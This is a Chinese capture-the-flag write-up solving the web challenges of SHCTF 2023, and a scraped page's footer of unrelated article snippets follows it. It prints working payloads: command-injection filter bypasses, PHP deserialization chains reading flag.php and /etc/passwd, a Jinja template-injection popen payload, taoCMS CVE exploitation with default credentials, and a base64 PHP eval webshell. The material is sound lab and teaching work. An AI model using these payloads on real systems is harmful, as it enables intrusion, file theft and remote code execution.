SHCTF-校外赛道 2023 WEB部分题解wp()

[WEEK1]babyRCE

开题,直接给了源码,简单过滤。

image-20231002150620364

被过滤绕过方法
cat/tacuniq
flagfla?
空格%09

payload:

?rce=ls%09/?rce=uniq%09/fla?

image-20231002151349821

[WEEK1]1zzphp

考点:intval()函数绕过(数组)、PCRE回溯次数限制绕过

直接给了源码:

image-20231002141143235

<?php 
error_reporting(0);
highlight_file('./index.txt');
if(isset($_POST['c_ode']) && isset($_GET['num']))
{$code = (String)$_POST['c_ode'];$num=$_GET['num'];if(preg_match("/[0-9]/", $num)){die("no number!");}elseif(intval($num)){if(preg_match('/.+?SHCTF/is', $code)){die('no touch!');}if(stripos($code,'2023SHCTF') === FALSE){die('what do you want');}echo $flag;}
} 

分析源码,我们若想执行echo $flag;,需要满足if(intval($num));不满足if(preg_match("/[0-9]/", $num))if(preg_match('/.+?SHCTF/is', $code))if(stripos($code,'2023SHCTF') === FALSE)这三个条件。

首先是第一部分,intval()函数绕过(数组),我们要满足$num里面没有数字(preg_match检测不出来),同时满足intval($num)为1(true)。

这里采用数组绕过。preg_math()传入数组参数会直接返回0,同时intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1故此传入?num[]=1,产生错误返回1。

?num[]=1

然后是第二部分,PCRE回溯次数限制绕过。要不满足if(preg_match('/.+?SHCTF/is', $code))if(stripos($code,'2023SHCTF') === FALSE)这两个条件,就是preg_match()函数检测不出字符串什么什么SHCTF,但是stripos()要检测出字符串2023SHCTF

代码有强制类型转换$code = (String)$_POST['c_ode'];,不能采用数组绕过。因为preg_match()函数包含.+?,我们采用PCRE回溯次数限制绕过来绕过preg_match()函数的检测,脚本如下:

import requestsres = requests.post("http://112.6.51.212:32674/?num[]=1",data = {"c_ode":"-"*1000000+"2023SHCTF"})
print(res.text)

image-20231002142717475

注意点:

2023SHCTF字符串放后面,因为回溯限制,回溯百万次后就不匹配了(前面的一百万字符),后面2023SHCTF的不会被preg_match()函数匹配。

[WEEK1]ez_serialize

题目描述:听说你会PHP反序列化漏洞?不信,除非can_can_need_flag

直接给了源码:

image-20231002151443763

构造简单POP链,学会魔术方法就行了。

__invoke(),调用函数的方式调用一个对象时的回应方法。

__get(),读取不可访问属性的值时,会被调用。

__toString() ,用于一个类被当成字符串时的回应。

链子:

B::__wakeup()->
C::__toString()->
D::__get($key)->
A::__invoke()

过滤不用管,匹配到了只是echo,又不die出。

EXP: (flag文件位置按经验猜)

<?php
highlight_file(__FILE__);
class A{public $var_1;public function __invoke(){include($this->var_1);}
}
class B{public $q;public function __wakeup(){if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->q)) {echo "hacker";}}
}
class C{public $var;public $z;public function __toString(){return $this->z->var;}
}
class D{public $p;public function __get($key){$function = $this->p;return $function();}
}
/*
B::__wakeup()->
C::__toString()->
D::__get($key)->
A::__invoke()
*/
$jay17=new B();
$jay17->q=new c();
$jay17->q->var="xxx";
$jay17->q->z=new D();
$jay17->q->z->p=new A();
$jay17->q->z->p->var_1="php://filter/read=convert.base64-encode/resource=flag.php";
echo urlencode(serialize($jay17));

image-20231002154705259

[WEEK1]登录就给flag

开题,要求我们登录。

image-20231002143524192

直接开始爆破,账号admin。爆破得到密码是password

image-20231002143943788

image-20231002143950327

[WEEK1]飞机大战

前端游戏题。

image-20231002154934408

flag在源码里面,自己解码一下。

image-20231002155120788

[WEEK1]ezphp

直接给了源码:
image-20231002161050296

仔细阅读逻辑发现,算是没过滤了。是先过滤,再赋值,过滤时候$code总是为空。

if(!preg_match(".....",$code)){$code=$_GET['code'];

特征代码一下子就能发现。preg_replace()的/e模式存在命令执行漏洞。可以参考:深入研究preg_replace与代码执行 - 先知社区 (aliyun.com)

payload:

GET:?code=${phpinfo()}POST:pattern=\S*

flag在phpinfo里面。

image-20231002161342232

[WEEK1]生成你的邀请函吧~

题目描述:

API:url/generate_invitation  
Request:POST application/json  
Body:{  "name": "Yourname",  "imgurl": "http://q.qlogo.cn/headimg_dl?dst_uin=QQnumb&spec=640&img_type=jpg"  
}  

使用POST json请求来生成你的邀请函吧flag就在里面哦


开题:

image-20231002144102109

应该是考察json格式发包,按照提示来就行了。

image-20231002145552328

会下载一个文件。

image-20231002145653058

flag在里面

image-20231002145710787

[WEEK2]serialize

直接给了源码,乍一看是PHP反序列化中的POP链构造。

image-20231010220237833

一、倒推一下,终点应该是milaoshu::__tostring()

二、misca::__get()方法中的die()函数可以调用milaoshu::__tostring()方法。不要被die吓到,虽然会直接结束运行,但是顺序是先触发milaoshu::__tostring(),再die出程序。

die()exit(),参数可以是字符串和数字,你传个类进去肯定是当作字符串了啊,那就触发了那个类(参数)的__tostring()魔术方法。

image-20231010220832396

三、musca::__weakup()方法可以调用misca::__get()方法。

所以最终链子如下:

musca::__weakup()->
misca::__get()->
milaoshu::__tostring()

先造个EXP看看:

<?phpclass misca{public $gao;public $fei;public $a;public function __get($key){$this->miaomiao();$this->gao=$this->fei;die($this->a);}public function miaomiao(){$this->a='Mikey Mouse~';}
}
class musca{public $ding;public $dong;public function __wakeup(){return $this->ding->dong;}
}
class milaoshu{public $v;public function __tostring(){echo"misca~musca~milaoshu~~~";include($this->v);}
}$a=new musca();$a->ding=new misca();
$a->dong="Jay17";   //不存在的属性。$a->ding->a=&$a->ding->gao;   //变量引用绕过miaomiao()方法。
$a->ding->fei=new milaoshu();$a->ding->fei->v="/etc/passwd";echo serialize($a);

生成的payload:

O:5:"musca":2:{s:4:"ding";O:5:"misca":3:{s:3:"gao";N;s:3:"fei";O:8:"milaoshu":1:{s:1:"v";s:11:"/etc/passwd";}s:1:"a";R:3;}s:4:"dong";s:5:"Jay17";}

还剩下两个问题,一是传参,二是绕过正则。

传参问题用PHP字符串解析特性:

PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:

  • 删除空白符
  • 将某些字符( [ 空格 + . )转换为下划线

实际应用:

  • get传参NSS_JAY,不能直接传时,传NSS[JAY。
    //php的变量解析绕过,[ 被处理成 _
  • 当[提前出现后,后面的 . 就不会再被转义成_了。
  • 当这些字符为首字母时,只有点号会被替换成下划线

所以我们GET提交的参数应该是:wanna[fl.ag

绕过正则,我们有两种办法。一是用O:+数字代替O:数字。二是再在外面包一层数组。

方法一:暂时不能用来解本题。

方法二:外面包一层数组

<?phpclass misca{public $gao;public $fei;public $a;public function __get($key){$this->miaomiao();$this->gao=$this->fei;die($this->a);}public function miaomiao(){$this->a='Mikey Mouse~';}
}
class musca{public $ding;public $dong;public function __wakeup(){return $this->ding->dong;}
}
class milaoshu{public $v;public function __tostring(){echo"misca~musca~milaoshu~~~";include($this->v);}
}$a=new musca();$a->ding=new misca();
$a->dong="Jay17";   //不存在的属性。$a->ding->a=&$a->ding->gao;   //变量引用绕过miaomiao()方法。
$a->ding->fei=new milaoshu();$a->ding->fei->v="php://filter/read=convert.base64-encode/resource=flag.php";$b[]=$a;
echo serialize($b);

payload:

?wanna[fl.ag=a:1:{i:0;O:5:"musca":2:{s:4:"ding";O:5:"misca":3:{s:3:"gao";N;s:3:"fei";O:8:"milaoshu":1:{s:1:"v";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}s:1:"a";R:4;}s:4:"dong";s:5:"Jay17";}}

image-20231019091923919

[WEEK2]no_wake_up

源码直接给了。

image-20231019092706691

<?php
highlight_file(__FILE__);
class flag{public $username;public $code;public function __wakeup(){$this->username = "guest";}public function __destruct(){if($this->username = "admin"){include($this->code);}}
}
unserialize($_GET['try']);

考察了PHP反序列化绕过__wakeup()。可以看看:绕过__wakeup() 反序列化 合集_Jay 17的博客-CSDN博客

PHP版本是7.0.9

image-20231019092926260

我们采用fast-destruct来绕过。原理是GC回收机制。

先写个EXP:

<?php
class flag{public $username;public $code;public function __wakeup(){$this->username = "guest";}public function __destruct(){if($this->username = "admin"){include($this->code);}}
}$a=new flag();
$a->username = "admin";
$a->code = "php://filter/read=convert.base64-encode/resource=flag.php";echo serialize($a);

生成:

O:4:"flag":2:{s:8:"username";s:5:"admin";s:4:"code";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

删掉末尾的花括号即可触发fast-destruct

payload:

?try=O:4:"flag":2:{s:8:"username";s:5:"admin";s:4:"code";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";

image-20231019194721495

[WEEK2]ez_rce***

题目描述:attack subprocess call(攻击子进程调用)

附件给了源码:

from flask import *
import subprocessapp = Flask(__name__)def gett(obj,arg):tmp = objfor i in arg:tmp = getattr(tmp,i)return tmpdef sett(obj,arg,num):tmp = objfor i in range(len(arg)-1):tmp = getattr(tmp,arg[i])setattr(tmp,arg[i+1],num)def hint(giveme,num,bol):c = gett(subprocess,giveme)tmp = list(c)tmp[num] = boltmp = tuple(tmp)sett(subprocess,giveme,tmp)def cmd(arg):subprocess.call(arg)@app.route('/',methods=['GET','POST'])
def exec():try:if request.args.get('exec')=='ok':shell = request.args.get('shell')cmd(shell)else:exp = list(request.get_json()['exp'])num = int(request.args.get('num'))bol = bool(request.args.get('bol'))hint(exp,num,bol)return 'ok'except:return 'error'if __name__ == '__main__':app.run(host='0.0.0.0',port=5000)

[WEEK2]MD5的事就拜托了

直接给了源码,考察MD5。

image-20231011211708754

整理一下,我们可以通过满足条件得到$flag的MD5和$flag的长度。然后我们需要算出md5($flag.urldecode($num))


一、如何获得$flag的MD5

判断条件:

extract(parse_url($_POST['SHCTF']));
if($$$scheme==='SHCTF'){echo(md5($flag));echo("</br>");
}

函数解释:

parse_url()

<?php
$url = 'http://username:password@hostname/path?arg=value#anchor';print_r(parse_url($url));输出:
Array
([scheme] => http[host] => hostname[user] => username[pass] => password[path] => /path[query] => arg=value[fragment] => anchor
)

extract():用来将变量从数组中导入到当前的符号表中。

如果要满足$$$scheme==='SHCTF',我们可以使[scheme] => host,导致$$host==='SHCTF';再使得[host] => user导致$user==='SHCTF',就满足条件。

相关数组构建:

Array
([scheme] => host[host] => user[user] => SHCTF[pass] => password[path] => /path[query] => arg=value[fragment] => anchor
)

传参:(POST)

SHCTF=host://SHCTF:password@user/path?arg=value#anchor

得到flag的MD5值:dbef700745bd5917d2c60821aab91d8d

image-20231011212941560


二、如何获得$flag的长度

判断条件:

if(isset($_GET['length'])){$num=$_GET['length'];if($num*100!=intval($num*100)){echo(strlen($flag));echo("</br>");}
}

intval()函数是取整,不保留小数。

传参:(GET)

?length=1.1111111

得到flag长度是42

image-20231011213719200

后来验证1.1也可以,想不明白为什么。。。。。

image-20231011213343500


三、算出md5($flag.urldecode($num))

$num我们可以自定义。

哈希扩展长度攻击的条件:md5("密文"+"已知字符串")=已知哈希值。由此条件我们可以获得md5("密文"+"处理过的已知字符串")=处理过的已知哈希值

关键思路:我们现在的条件是md5($flag)=已知哈希值,是不是也是md5("$flag少一个花括号"+"}")=已知哈希值

hashpump工具用法:文件夹下开终端(cd进去也可以),输入hashpump

Input Signature                    #现有哈希值(题目给的MD5)
Input Data                         #已知字符串"}"
Input Key Length                   #为密文长度"41"
Input Data to Add                  #为补位后自己加的字符串(自定义)

image-20231011220539875

e4d9c26257dc63b7f1a2ae3f9e72fa01}\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00Jay17

可以看到返回给我们两行内容,第一行是处理过的哈希值,第二行是处理过的已知字符串。

满足:md5("密文"+"处理过的已知字符串")=处理过的哈希值。就是md5($flag+"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00Jay17")=e4d9c26257dc63b7f1a2ae3f9e72fa01

\x换成%然后url编码一下就行。

payload:

GET:
?length=%2580%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500P%2501%2500%2500%2500%2500%2500%2500Jay17POST:
SHCTF=e4d9c26257dc63b7f1a2ae3f9e72fa01

image-20231011220943351

[WEEK2]ez_ssti

经典SSTI,GET传参name就行。

image-20231019195045211

我们选择用popen函数执行命令,其他五种执行命令方式同理。

先测测os模块在哪

{{x.__class__.__bases__.__getitem__(0).__subclasses__()}}

定位132

image-20231019195318731

没有过滤,payload:

?name={{''.__class__.__bases__.__getitem__(0).__subclasses__()[132].__init__.__globals__.popen('tac /flag').read()}}

image-20231019195352791

[WEEK2]EasyCMS

开题,是taoCMS

image-20231019195447306

这个CMS有两个CVE,分别是CVE-2021-44915CVE-2022-25578

先看CVE-2021-44915

路由/admin/admin.php是后台,登录账号和密码默认是admin、tao,选择管理栏目菜单。

image-20231019202601305

点击编辑,然后随便改点内容,提交时候抓包。

image-20231019202719867

image-20231019203016486

id是注入点。直接拿sqlmap跑就行了。

再看CVE-2022-25578

路由/admin/admin.php是后台,登录账号和密码默认是admin、tao,选择文件管理

image-20231019200832094

是否还记得文件上传中的.htaccess配置文件绕过发,在这个文件中加入一句AddType application/x-httpd-php .jpg,将所有jpg文件当作php文件解析。

image-20231019201249212

但是这里没有/pictures目录,本来应该在/pictures新建一个jpg文件,内容是一句话马。

image-20231019201709662

所以说这里是无法使用CVE-2022-25578来任意命令执行的。

我们等价替换一下,直接改了index.php的源码,内容换成一句话木马。

image-20231019202436142

[WEEK3]快问快答

题目描述:

男:尊敬的领导,老师
女:亲爱的同学们
合:大家下午好!
男:伴着优美的音乐,首届SHCTF竞答比赛拉开了序幕。欢迎大家来到我们的比赛现场。

一看就是需要写脚本的题目。要求两秒以内回答,连续回答50题。

image-20231019203914413

先抓个包看看,重要请求头如下:

Cookie: PHPSESSID=e313320de60a72577f25da74fb6a3bdb; session=eyJjb3VudGVyIjo1LCJzY29yZSI6MCwic3RhcnRfdGltZSI6MTY5NzcxOTExOS41MzY1NzV9.ZTEjTw.-Xs2_MbzxDUqILiUvJcNdrmsyPkanswer=11

image-20231019204036891

再看一下返回包:

image-20231019204432710

注意一点,题目替换了一些符号:

题目符号数学符号
x*
异或^
&
÷// (整除)

根据包和字符替换写的脚本如下:

脚本如下:

#Author:Jay17
import re
import requests
import timeurl = 'http://112.6.51.212:32329/'
res = requests.session()      #创建session对象,用来保存当前会话的持续有效性。不创建也可以调用对应的方法发送请求,但是没有cookie,那就无法记录答题数量。
response = res.get(url)   #发get包,获取题目
time.sleep(1)  # 睡一秒for i in range(1, 99):math = ""n=0resTest = response.text            #获取返回包的内容print(response.text)for j in range(0, len(resTest)): #遍历获取网页数学表达式,这里建议用正则表达式(re)if resTest[j - n] == ":":if resTest[j]=="=":breakmath = math + resTest[j]n+=1# strip() 方法用于移除字符串头尾指定的字符(默认为空格或换行符)或字符序列math = math.strip('=')      #去掉末尾等号math = math.strip(':')  # 去掉开头冒号math = math.strip(' ')  # 去掉首尾空格#替换字符math = re.sub(r'x', '*', math)math = re.sub(r'÷', '//', math)math = re.sub(r'异或', '^', math)math = re.sub(r'与', '&', math)print(math)num = eval(math)       #计算数学表达式的值myData = {   #构造的POST数据'answer': num}# 更新session#cookie = res.headers.get("Set-Cookie")# 更新http头#h_s = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': cookie}#监听:,proxies={"http":"127.0.0.1:8080"}response = res.post(url, data=myData,proxies={"http":"127.0.0.1:8080"}) #发post包,提交答案,并且获取返回包,获取下一个计算式print(response.text)          #打印当前返回包的内容time.sleep(1)  # 睡一秒if "flag{" in response.text:       #如果返回包里面有flagprint("\n\n\nFlaggggggggg: ", response.text)exit() # 退出当前程序,也可以break

image-20231019213208729

[WEEK3]sseerriiaalliizzee

题目描述:don’t want to die

直接给了源码:

image-20231020120534580

<?php
error_reporting(0);
highlight_file(__FILE__);class Start{public $barking;public function __construct(){$this->barking = new Flag;}public function __toString(){return $this->barking->dosomething();}
}class CTF{ public $part1;public $part2;public function __construct($part1='',$part2='') {$this -> part1 = $part1;$this -> part2 = $part2;}public function dosomething(){$useless   = '<?php die("+Genshin Impact Start!+");?>';$useful= $useless. $this->part2;file_put_contents($this-> part1,$useful);}
}
class Flag{public function dosomething(){include('./flag,php');return "barking for fun!";}
}$code=$_POST['code']; if(isset($code)){echo unserialize($code);}else{echo "no way, fuck off";}
?> 

第一眼肯定觉得直接反序列化一个Start类,直接就能包含flag.php获得flag了。但是问题是包含了不回显啊。所以我们要重新找条链子。

image-20231020120909957

真实链子如下:

Start::__construct()->
Start::__toString()->
CTF::dosomething()

只有一个问题,就是如何绕过死亡die,成功写入文件:

$useless   = '<?php die("+Genshin Impact Start!+");?>';
$useful= $useless. $this->part2;
file_put_contents($this-> part1,$useful);

我们使用base64绕过,同时这里是不同变量。

<?php $filename=$_GET['filename']; $content=$_GET['content']; file_put_contents($filename,"<?php exit();".$content); **绕过原理: **通过base64解密或rot13解密使"<?php exit();"变为乱码,而传入的$content为base64编码,解码后为正常shell语句。通过这种方式使前者失效。 **构造payload:** base64 ?filename=php://filter/convert.base64-decode/resource=1.php&content=PD9waHAgZXZhbCgkX1BPU1RbMV0pOw== (也可以是php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php,自动将<?php?>全部删掉)

由此原理我们可以构造EXP:

<?php
class Start{public $barking;public function __construct(){$this->barking = new Flag;}public function __toString(){return $this->barking->dosomething();}
}
class CTF{public $part1;public $part2;public function __construct($part1='',$part2='') {$this -> part1 = $part1;$this -> part2 = $part2;}public function dosomething(){$useless   = '<?php die("+Genshin Impact Start!+");?>';$useful= $useless. $this->part2;file_put_contents($this-> part1,$useful);}
}
class Flag{public function dosomething(){include('./flag,php');return "barking for fun!";}
}
$a=new Start();
$a->barking=new CTF();
$a->barking->part1="php://filter/convert.base64-decode/resource=17.php";
$a->barking->part2="PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==";echo serialize($a);

payload:

code=O:5:"Start":1:{s:7:"barking";O:3:"CTF":2:{s:5:"part1";s:50:"php://filter/convert.base64-decode/resource=17.php";s:5:"part2";s:32:"PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==";}}

文件写入成功,但是没有回显或出现乱码。

image-20231020123559273

image-20231020123118585

原因是base64位数不符合。自己拿在线网站解密一下就知道了。

image-20231020123632740

解决办法是补位,在base64的恶意代码前面补两个字符。

image-20231020123652845

由此我们最终payload是:

code=O:5:"Start":1:{s:7:"barking";O:3:"CTF":2:{s:5:"part1";s:50:"php://filter/convert.base64-decode/resource=17.php";s:5:"part2";s:34:"aaPD9waHAgZXZhbCgkX1BPU1RbMV0pOw==";}}

image-20231020123759226

[WEEK3]gogogo

开题,题目提示我们要变成admin身份。

image-20231030175648976

先看看他是怎么判断身份的。应该是cookie中的session。

image-20231030175750734

但是头大的是,这个session我们暂时无法解密。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/155561.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

智慧矿山系统中的猴车安全监测与识别

智慧矿山是近年来兴起的一种采用人工智能&#xff08;AI&#xff09;技术的矿山管理方式&#xff0c;它通过利用智能传感设备和先进算法来实现对矿山环境和设备进行监测和管理&#xff0c;从而提高矿山的安全性和效率。在智慧矿山的AI算法系列中&#xff0c;猴车不安全行为识别…

PgSQL-执行器机制-Unique算子

PgSQL-执行器机制-Unique算子 PgSQL中输出去重的元组有多种方法&#xff0c;比如通过HashAgg或者GroupAgg。这里我们介绍第三种方法&#xff0c;通过Unique算子来完成这个功能。当然语句上可以是&#xff1a;select distinct(id1) from t; 1、ExecUnique 执行器执行算子的函数都…

Python 自动化详解(pyautogui)

文章目录 1 概述1.1 第三方库&#xff1a;pyautogui1.2 坐标说明 2 操作对象2.1 鼠标2.1.1 定位2.1.2 移动2.1.3 拖动2.1.4 滚动2.1.5 点击 2.2 键盘2.2.1 输入2.2.2 按键2.2.3 快捷键 2.3 屏幕2.3.1 截图2.3.2 分辨率 2.4 信息提示2.4.1 提示框2.4.2 选择框2.4.3 密码输入2.4.…

SAM:Segment Anything 代码复现和测试 基本使用

相关地址 代码&#xff1a; https://github.com/facebookresearch/segment-anything 在线网站&#xff1a; https://segment-anything.com/demo 环境配置 建议可以clone下来学习相关代码&#xff0c;安装可以不依赖与这个库 git clone https://github.com/facebookresearch…

计算机毕业设计选题推荐-社区志愿者服务微信小程序/安卓APP-项目实战

✨作者主页&#xff1a;IT毕设梦工厂✨ 个人简介&#xff1a;曾从事计算机专业培训教学&#xff0c;擅长Java、Python、微信小程序、Golang、安卓Android等项目实战。接项目定制开发、代码讲解、答辩教学、文档编写、降重等。 ☑文末获取源码☑ 精彩专栏推荐⬇⬇⬇ Java项目 Py…

【Bug—eNSP】华为eNsp路由器设备启动一直是0解决方案!

目录 一、项目场景 二、问题描述 三、原因分析 四、解决方案 注意&#

喜讯!合合信息顺利通过CMMI3级评估

近日&#xff0c;在擎标顾问团的咨询辅导下&#xff0c;上海合合信息科技股份有限公司&#xff08;简称“合合信息”&#xff09;顺利通过了CMMI3级评估。CMMI是国际上最流行、最实用的一种软件生产过程标准和软件企业成熟度等级认证的标准&#xff0c;通过该认证表明企业在开发…

OpenAI将推出ChatGPT Plus会员新功能,有用户反馈将支持上传文件和多模态

&#x1f989; AI新闻 &#x1f680; OpenAI将推出ChatGPT Plus会员新功能&#xff0c;有用户反馈将支持上传文件和多模态 摘要&#xff1a;OpenAI为ChatGPT Plus会员推出了一些新功能&#xff0c;包括上传文件、处理文件和多模态支持。用户不再需要手动选择模式&#xff0c;…

Day 11 python学习笔记

模块 内置模块 random random&#xff1a;随机数模块 我们可以在解释器中看到其蕴含的方法 接下来我解释一些常用的方法&#xff1a; random.random( ) random.random( ) 返回0-1的随机数 [0,1) >>> random.random() 0.364183511476754 random.randint(n,m) r…

CentOS7非lvm给根分区扩容

首先查看现有磁盘信息和文件系统的信息 关闭虚拟机&#xff0c;右键虚拟机&#xff0c;点击设置&#xff0c;选中硬盘&#xff0c;右边点击拓展&#xff0c;然后给磁盘空间增加到指定的大小 打开虚拟机&#xff0c;查看扩容后的分区大小&#xff0c;此时会发现根分区大小并…

「Dr. Bomkus 的试炼」排行榜说明

简要概括 七大区域&#xff0c;一个任务&#xff1a;六场扣人心弦的试炼&#xff0c;有一个休闲大厅作为每场试炼的起点。 试炼 排行榜&#xff1a;掌握每场试炼&#xff0c;攀登排行榜。 以 Ethos Point 来记分&#xff1a;每个试炼中的任务都会获得一个EP。 两种任务类型&am…

Python 中__name__ == ‘__main__‘使用说明

在学习C语言的时候&#xff0c;程序的运行是从main函数开始的&#xff0c;因此&#xff0c;功能代码一般写到main函数中&#xff0c;子程序如果想要调用&#xff0c;也需要在main函数中进行调用。 然而&#xff0c;Python语言中&#xff0c;程序从第一行就开始执行(定义函数除外…